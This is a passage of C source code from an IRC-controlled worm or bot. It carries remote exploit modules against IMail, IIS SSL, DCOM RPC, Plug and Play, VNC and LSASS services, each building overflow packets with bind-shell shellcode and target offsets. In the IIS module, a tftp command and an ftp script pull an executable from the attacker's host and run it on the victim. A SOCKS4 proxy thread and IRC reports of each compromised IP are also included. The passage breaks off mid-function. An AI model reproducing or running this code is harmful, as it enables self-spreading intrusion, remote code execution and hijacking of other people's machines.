if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Getting Banner for %s",exinfo.ip);Sleep(1500);
if (strstr(szBanner,"IMail 7.04"))
iRemoteTarget = 0;
else if (strstr(szBanner,"IMail 7.05"))
iRemoteTarget = 1;
else if (strstr(szBanner,"IMail 7.06"))
iRemoteTarget = 2;
else if (strstr(szBanner,"IMail 7.07"))
iRemoteTarget = 2;
else if (strstr(szBanner,"IMail 7.10"))
iRemoteTarget = 3;
else if (strstr(szBanner,"IMail 7.11"))
iRemoteTarget = 4;
else if (strstr(szBanner,"IMail 7.12"))
iRemoteTarget = 5;
else if (strstr(szBanner,"IMail 7.13"))
iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 7.14"))
iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 7.15"))
iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 8.00"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.01"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.02"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.03"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.04"))
iRemoteTarget = 8;
else if (strstr(szBanner,"IMail 8.05"))
iRemoteTarget = 9;
else if (strstr(szBanner,"IMail 8.10"))
iRemoteTarget = 10;
else if (strstr(szBanner,"IMail 8.11"))
iRemoteTarget = 12;
else if (strstr(szBanner,"IMail 8.12"))
iRemoteTarget = 13;
else if (strstr(szBanner,"IMail 8.13"))
iRemoteTarget = 14;
else if (strstr(szBanner,"IMail 8.14"))
iRemoteTarget = 14;
else if (strstr(szBanner,"IMail 8.15"))
iRemoteTarget = 15;
else
iRemoteTarget = -1;
if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Banner for %s is %s, iRemoteTarget is %d",exinfo.ip,szBanner,iRemoteTarget);Sleep(1500);
memcpy(szImailPacket + 12, bindshell, ibindsize -1);
if (iRemoteTarget == -1) return FALSE;
if (pImailTargets[iRemoteTarget].iSEHAddress == 0)
memcpy(szImailPacket + 700, &pImailTargets[iRemoteTarget].lOffset, 4);
else
if (pImailTargets[iRemoteTarget].iSEHAddress == 1)
memcpy(szImailPacket + 692, &pImailTargets[iRemoteTarget].lOffset, 4);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Crafting Malicious Packet for %s",exinfo.ip);Sleep(1500);
if(fsend(sSocket, szImailPacket, sizeof(szImailPacket), 0) == SOCKET_ERROR)
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Malicious packet for %s sent",exinfo.ip);Sleep(1500);
fclosesocket(sSocket);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Socket Closed for %s",exinfo.ip);Sleep(1500);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
} else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
return FALSE;
}
BOOL IIS5SSL(EXINFO exinfo)
{
char buffer[IRCLINE];
char request[]="\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";
unsigned long XOR=0xffffffff;
unsigned long offsets[] = {
0x6741a1cd, // Win2K SP0
0x6741a199, // Win2K SP1
0x6741a426, // Win2K SP2
0x67419e1d, // Win2K SP3
0x67419ce8, // Win2K SP4
0x0ffb7de9, // WinXP SP0
0x0ffb832f // WinXP SP1
};
BOOL bRet = FALSE;
unsigned char *badbuffer=(unsigned char*)malloc(347);
memset(badbuffer, 0, 347);
unsigned char *p=badbuffer;
memcpy(p, request, sizeof(request));
p+=sizeof(request)-1;
strcat((char*)p, jumper);
strcat((char*)p, bind_shell_code);
SOCKET sSock;
if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
// FIX ME: since i didnt found a way to determine the remote OS, i
// placed this all together in a loop. this aint the best way
// i'm sure about that
for (int i=0; i < (sizeof(offsets) / sizeof(LPTSTR)); i++) {
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(exinfo.port);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
offsets[i]^=XOR;
strncat((char*)p, (char*)&offsets[i], 4);
strcat((char*)p, shellcode);
if (fsend(sSock, (char *)&badbuffer, strlen((char *)&badbuffer), 0)) {
Sleep(1000);
fclosesocket(sSock);
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(1981);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin))) {
char cmd_buff[400];
#ifndef NO_TFTPD
_snprintf(cmd_buff, sizeof (cmd_buff),
"tftp -i %s get %s\r\n",
GetIP(exinfo.sock),filename, filename);
#endif
#ifndef NO_FTPD
_snprintf(cmd_buff, sizeof (cmd_buff),
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
#endif
if(frecv(exinfo.sock, buffer, sizeof(buffer), 0) > 0) {
Sleep(500);
if(fsend(sSock,(char*)cmd_buff, strlen(cmd_buff),0) > 0) {
fclosesocket(sSock);
bRet = TRUE;
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
break;
}
}
}
}
}
fclosesocket(sSock);
}
}
return (bRet);
}
DWORD WINAPI Socks4ClientThread(LPVOID param)
{
SOCKS4 socks4 = *((SOCKS4 *)param);
SOCKS4 *socks4p = (SOCKS4 *)param;
socks4p->cgotinfo = TRUE;
int threadnum = socks4.cthreadnum;
SOCKS4HEADER hdr;
TIMEVAL timeout;
timeout.tv_sec = 5;
timeout.tv_usec = 0;
fd_set fd;
FD_ZERO(&fd);
FD_SET(threads[threadnum].sock, &fd);
if (fselect(0, &fd, NULL, NULL, &timeout) == 0) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if (frecv(threads[threadnum].sock, (char *)&hdr, sizeof(hdr), 0) <= 0) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if (hdr.vn != 4 || hdr.cd != SOCKS4_CONNECT) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
// FIX ME: do a userid (hdr.userid) check here if you wish to use simple auth (needs testing)
if (socks4.userid[0] != '\0') {
if (strcmp(hdr.userid, socks4.userid) != 0) {
addlogv("[SOCKS4]: Authentication failed. Remote userid: %s != %s.", hdr.userid, socks4.userid);
hdr.vn = 0;
hdr.cd = SOCKS4_REJECT_USERID;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
}
SOCKADDR_IN tsin;
memset(&tsin, 0, sizeof(tsin));
tsin.sin_family = AF_INET;
tsin.sin_port = hdr.destport;
tsin.sin_addr.s_addr = hdr.destaddr;
SOCKET tsock;
if ((tsock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
addlogv("[SOCKS4]: Error: Failed to open socket(), returned: <%d>.", fWSAGetLastError());
hdr.vn = 0;
hdr.cd = SOCKS4_REJECT;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if (fconnect(tsock, (LPSOCKADDR)&tsin, sizeof(tsin)) == SOCKET_ERROR) {
addlogv("[SOCKS4]: Error: Failed to connect to target, returned: <%d>.", fWSAGetLastError());
hdr.vn = 0;
hdr.cd = SOCKS4_REJECT;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
hdr.vn = 0;
hdr.cd = SOCKS4_GRANT;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
TransferLoop(tsock, threads[threadnum].sock);
fclosesocket(tsock);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
BOOL dcom(EXINFO exinfo)
{
char sendbuf[IRCLINE];
if (exinfo.port == 445) {
NETRESOURCEW nr;
if (!ConnectViaNullSession(exinfo.ip, &nr))
return FALSE;
else {
char szPipePath[MAX_PATH];
sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", exinfo.ip);
HANDLE hFile = CreateFile(szPipePath, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
CloseNullSession(exinfo.ip);
return FALSE;
}
// sprintf(sendbuf, "[dcom]: Connected to pipe \\\\%s\\pipe\\epmapper", exinfo.ip);
// irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
int TargetOS = FpHost(exinfo.ip, FP_PORT5K);
// get shellcode
DWORD reqbufsize;
char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, TRUE);
if (!reqbuf) {
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
unsigned long lWritten;
char *szInBuf = (char *)malloc(100000);
memset(szInBuf, 0, 100000);
// send the bind string
DWORD dwRead;
TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
if (szInBuf[2] != 0x0C) {
free(szInBuf);
free(reqbuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
// send the evil request
if (!WriteFile(hFile, reqbuf, reqbufsize, &lWritten, 0)) {
free(szInBuf);
free(reqbuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
BOOL Result = ReadFile(hFile, szInBuf, 10000, &dwRead, NULL);
free(reqbuf);
free(szInBuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
if (Result == TRUE) {
return FALSE;
}
}
} else { // port 135 and others
int TargetOS = FpHost(exinfo.ip, FP_RPC);
if (TargetOS == OS_WINNT)
return FALSE;
// get a funky fresh socket
SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (sSocket == SOCKET_ERROR)
return FALSE;
// fill in sockaddr and resolve the host
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
// get shellcode
DWORD reqbufsize;
char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, FALSE);
if (!reqbuf) {
fclosesocket(sSocket);
return FALSE;
}
// connect to the server
int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
if (iErr == -1) { // connect failed, exit
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// send the bind string
if (fsend(sSocket, bindstr, sizeof(bindstr)-1, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// read reply
char recvbuf[4096];
frecv(sSocket, recvbuf, 4096, 0);
// Send the evil request
if (fsend(sSocket, reqbuf, reqbufsize, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// read reply
if (frecv(sSocket, recvbuf, 4096, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
free(reqbuf);
// Close the socket
fclosesocket(sSocket);
}
sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
for (int i=0; i < 6; i++) {
if (searchlog(sendbuf)) {
sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
break;
}
Sleep(5000);
}
return TRUE;
}
BOOL scvx(char *target, void* conn,EXINFO exinfo)
{
IRC* irc=(IRC*)conn;
SOCKET sockfd;
// int gport;
int len, len1, TargetOS;
unsigned short port = 135;
char *buf1="0x001";
char *buf2="0x001";
char lport[] = "\x00\xFF\xFF\x8b";
struct sockaddr_in their_addr;
unsigned short tport;
unsigned char *sc;
TargetOS = FpHost(exinfo.ip, FP_SMB);
if (TargetOS == OS_WIN2K3)
{
//type = 0;
// gport=fhtons(bindport);
// memcpy(&lport[1], &gport, 2);
// *(long*)lport = *(long*)port^0x9432BF80;
// memcpy(&sc[471],&lport,4);
tport=fhtons(bindport)^(USHORT)0x9999;
memcpy(&bindshell[176],&tport,2);
sc=(unsigned char *)bindshell;
// memcpy(sc+36, (unsigned char *) &dcomtargets[type].ret, 4);
their_addr.sin_family = AF_INET;
their_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
their_addr.sin_port = fhtons(port);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
return FALSE;
if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(their_addr)) == SOCKET_ERROR)
return FALSE;
len=strlen((const char*)sc);
memcpy(buf2,fcr,sizeof(fcr));
len1=sizeof(fcr);
*(unsigned long *)(mmps)=*(unsigned long *)(mmps)+strlen((const char*)sc)/2;
*(unsigned long *)(svcd+8)=*(unsigned long *)(svcd+8)+strlen((const char*)sc)/2;
memcpy(buf2+len1,mmps,sizeof(mmps));
len1=len1+sizeof(mmps);
memcpy(buf2+len1,sc,strlen((const char*)sc));
len1=len1+strlen((const char*)sc);
memcpy(buf2+len1,sc1,sizeof(sc1));
len1=len1+sizeof(sc1);
memcpy(buf2+len1,svcd,sizeof(svcd));
len1=len1+sizeof(svcd);
*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+strlen((const char*)sc)-0xc;
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
return FALSE;
len=frecv(sockfd, buf1, 1000, 0);
if (fsend(sockfd,buf2,len1,0)== -1)
return FALSE;
fclosesocket(sockfd);
Sleep(2000);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
}
else
{
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
}
return TRUE;
}
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum )
{
SOCKADDR_IN addr;
int len;
int sockfd;
unsigned short smblen;
char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];
IRC* irc=(IRC*)conn;
BOOL success=FALSE;
char* thisTarget;
int pnpbindsize=405;
int TargetOS, Target;
char* tOS="";
WSADATA wsa;
fWSAStartup(MAKEWORD(2,0), &wsa);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE;
thisTarget = exinfo.ip;
TargetOS=FpHost(thisTarget,FP_NP);
if (TargetOS==OS_UNKNOWN)
TargetOS=FpHost(thisTarget,FP_SMB);
if (TargetOS == OS_WINNT){
Target=OS_WINNT;
success=FALSE;
}else if (TargetOS==OS_WINXP){
Target=OS_WINXP;
success=FALSE;
}else if (TargetOS==OS_WIN2K){
Target=OS_WIN2K;
success=TRUE;
}else{
success=FALSE;
}
ZeroMemory(&addr,sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = finet_addr(thisTarget);
addr.sin_port = fhtons((unsigned short)exinfo.port);
if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE;
if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if (len <= 10) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp,"\\\\%s\\IPC$",thisTarget);
convert_name((char *)ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));
// Start prepare header -- dETOX mod --
memcpy(RPC_call + 260, Offsets[OffNum], 4);
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
unsigned short port;
port = fhtons(bindport)^(USHORT)0x9999;
memcpy(&bindshell[176],&port,2);
memcpy(ptr,bindshell,pnpbindsize-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE;
frecv(sockfd, recvbuf, 4096, 0);
if (!exinfo.silent && exinfo.verbose){
switch(Target){
case 1:
tOS="WINNT";
break;
case 2:
tOS="WIN2K";
break;
case 3:
tOS="WINXP";
break;
default:
tOS="UNKNOWN/2K3/LINUX";
break;
}
irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip);
}
// if(success){
Sleep(2000);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
// }
return TRUE;
}
BOOL VNCScanner(EXINFO exinfo) {
char buffer[IRCLINE];
char szClientPacket[] = "\x01";
struct sockaddr_in thataddr;
int res;
SOCKET m_sock;
m_sock = fsocket(PF_INET, SOCK_STREAM, 0);
if (m_sock == INVALID_SOCKET) {
fclosesocket(m_sock);
return FALSE;
}
thataddr.sin_addr.s_addr = finet_addr(exinfo.ip);
thataddr.sin_family = AF_INET;
thataddr.sin_port = fhtons((unsigned short)exinfo.port);
res = fconnect(m_sock, (LPSOCKADDR) &thataddr, sizeof(thataddr));
if (res == SOCKET_ERROR) {
fclosesocket(m_sock);
return FALSE;
}
//connected
//now lets negotiate protocol
rfbProtocolVersionMsg pv;
if (!ReadExact(m_sock, pv, sz_rfbProtocolVersionMsg)) {
closesocket(m_sock);
return FALSE;
}
pv[sz_rfbProtocolVersionMsg] = 0;
int m_majorVersion, m_minorVersion;
if (sscanf(pv,rfbProtocolVersionFormat,&m_majorVersion,&m_minorVersion) != 2) {
closesocket(m_sock);
return FALSE;
}
if (!(m_majorVersion == 3) && !(m_minorVersion == 8)) {
//Server is not 3.8
closesocket(m_sock);
return FALSE;
}
if (!WriteExact(m_sock, pv, sz_rfbProtocolVersionMsg)) {
closesocket(m_sock);
return FALSE;
}
//auth part
CARD32 authScheme, authResult;
// CARD8 challenge[CHALLENGESIZE];
//we expect to get 2 bytes
if (!ReadExact(m_sock, (char *)&authScheme, 2)) {
closesocket(m_sock);
return FALSE;
}
//return clientpacket
if (!WriteExact(m_sock, szClientPacket, 1)) {
closesocket(m_sock);
return FALSE;
}
if (ReadExact(m_sock, (char *) &authResult, 4)) {
authResult = Swap32IfLE(authResult);
switch (authResult) {
case rfbVncAuthOK:
{
rfbServerInitMsg m_si;
//send non-shared session request and receive data
if (WriteExact(m_sock, (char *) useShared, sz_rfbClientInitMsg) &&
ReadExact(m_sock, (char *) &m_si, sz_rfbServerInitMsg)) {
//lets get desktop name
m_si.framebufferWidth = Swap16IfLE(m_si.framebufferWidth);
m_si.framebufferHeight = Swap16IfLE(m_si.framebufferHeight);
m_si.format.redMax = Swap16IfLE(m_si.format.redMax);
m_si.format.greenMax = Swap16IfLE(m_si.format.greenMax);
m_si.format.blueMax = Swap16IfLE(m_si.format.blueMax);
m_si.nameLength = Swap32IfLE(m_si.nameLength);
TCHAR *m_desktopName;
m_desktopName = new TCHAR[m_si.nameLength + 2];
ReadString(m_sock, m_desktopName, m_si.nameLength);
_snprintf(buffer, sizeof(buffer), "VNC%d.%d %s: %s - [AuthBypass]",
m_majorVersion, m_minorVersion, m_desktopName, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
closesocket(m_sock);
return TRUE;
}
break;
}
default:
{
break;
}
}
}
closesocket(m_sock);
return FALSE;
}
BOOL lsasscb(EXINFO exinfo)
{
int len;
SOCKET sockfd;
BOOL success = FALSE;
char recvbuf[1600];
SOCKADDR_IN their_addr;
memset(&their_addr, 0, sizeof(their_addr));
{
their_addr.sin_family = AF_INET;
their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list);
/* ^ Server's address */
their_addr.sin_port = fhtons((unsigned short)exinfo.port);
/* connect to the server */
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
return FALSE;
if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(their_addr)) == SOCKET_ERROR)
return FALSE;
if (fsend(sockfd, req1, sizeof(req1)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
if (fsend(sockfd, req2, sizeof(req2)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
if (fsend(sockfd, req3, sizeof(req3)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, 1600, 0);
switch (recvbuf[68]) {
case '1': // win XP
Exploit2CB( exinfo, sockfd, 0 );
if (Exploit2CB( exinfo, sockfd, 0 ))
success = TRUE;
break;
case '0': //win 2k
if (!Exploit2CB( exinfo, sockfd, 2 )) {
if (Exploit2CB( exinfo, sockfd, 1))
success = TRUE;
} else {
success = TRUE; }
break;
default:
return FALSE;
}
}
fclosesocket(sockfd);
if (success) {
//_snprintf(buffer, sizeof(buffer), "-\x03\x34\2lsass cb\2\x03- exploiting %s...", exploit[exinfo.exploit].name, exinfo.ip);
//if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
//addlog(buffer);
exploit[exinfo.exploit].stats++;
}
return TRUE;
}
BOOL lsass2(EXINFO exinfo)
{
int i, targetx, len, targetxOS;
char hostipc[40];
char hostipc2[40*2];
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char req4u[sizeof(reqx4)+20];
char screq[BUFSIZE+sizeof(reqx7)+1500+440];
char screq2k[4348+4060];
char screq2k2[4348+4060];
char recvbuf[1600];
char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4";
char strBuffer[BUFSIZE];
char buffer[IRCLINE], cmd_buff[400];
char smblen;
char unclen;
unsigned short port;
SOCKET sSocket, bSocket;
SOCKADDR_IN ssin, bsin;
targetxOS = FpHost(exinfo.ip, FP_RPC);
if ((targetxOS == OS_UNKNOWN) || (targetxOS == OS_WINNT))
return FALSE;
if (targetxOS == OS_WINXP)
targetx = 0;
else if (rand() % 10)
targetx = 1;
else
targetx = 2;
_snprintf(hostipc, sizeof(hostipc),"\\\\%s\\ipc$", exinfo.ip);
for (i=0; i<40; i++) {
hostipc2[i*2] = hostipc[i];
hostipc2[i*2+1] = 0;
}
memcpy(req4u, reqx4, sizeof(reqx4)-1);
memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
memcpy(req4u+47+strlen(hostipc)*2, reqx4+87, 9);
smblen = 52+(char)strlen(hostipc)*2;
memcpy(req4u+3, &smblen, 1);
unclen = 9 + (char)strlen(hostipc)*2;
memcpy(req4u+45, &unclen, 1);
port = fhtons(LSASS_BSPORT)^(USHORT)0x9999;
memcpy(&bindshell[176], &port, 2);
if ((targetx == 1) || (targetx == 2)) {
memset(buf, NOP, LEN);
//memcpy(&buf[2020], "\x3c\x12\x15\x75", 4);
memcpy(&buf[2020], &ttargetx[targetx].jmpaddr, 4);
memcpy(&buf[2036], &bindshell, strlen(bindshell));
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
memcpy(&buf[2844], &ttargetx[targetx].jmpaddr, 4); // jmp ebx addr
//memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr
memcpy(&buf[2856], &bindshell, strlen(bindshell));
for (i=0; i<LEN; i++) {
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;
memset(screq2k, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
memset(screq2k2, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
} else {
memset(strBuffer, NOP, BUFSIZE);
memcpy(strBuffer+160, bindshell, strlen(bindshell));
memcpy(strBuffer+1980, strasm, strlen(strasm));
*(long *)&strBuffer[1964]=ttargetx[targetx].jmpaddr;
}
memset(screq, 0x31, BUFSIZE+sizeof(reqx7)+1500);
if ((sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP)) == SOCKET_ERROR)
return FALSE;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
if (fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
fclosesocket(sSocket);
return FALSE;
}
if (fsend(sSocket, reqx1, sizeof(reqx1)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx2, sizeof(reqx2)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx3, sizeof(reqx3)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, req4u, smblen+4, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx5, sizeof(reqx5)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx6, sizeof(reqx6)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if ((targetx == 1) || (targetx == 2)) {
memcpy(screq2k, reqx8, sizeof(reqx8)-1);
memcpy(screq2k+sizeof(reqx8)-1, sendbuf, (LEN+1)*2);
memcpy(screq2k2, reqx9, sizeof(reqx9)-1);
